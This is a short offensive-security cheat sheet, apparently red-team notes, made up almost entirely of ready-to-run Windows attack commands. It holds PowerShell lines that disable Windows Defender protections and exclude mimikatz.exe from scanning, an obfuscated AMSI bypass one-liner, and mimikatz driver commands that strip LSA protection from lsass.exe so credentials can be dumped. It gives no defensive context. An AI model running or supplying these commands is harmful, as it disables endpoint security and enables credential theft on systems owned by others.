🔧 Initial Setup & Bypasses

💻 PowerShell Setup

# Run as Administrator
Start-Process PowerShell_ISE -Verb RunAs

# Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Add-MpPreference -ExclusionPath "C:\Temp"
Add-MpPreference -ExclusionProcess "mimikatz.exe"

🚫 AMSI Bypass

# Method 1: Obfuscated
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('Non'+'Publ'+'i'),'c','Stat','ic','ic|NonPubli' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

🛡️ LSA Protection Bypass

# Check status
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL

# Method 1: mimidrv
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove

---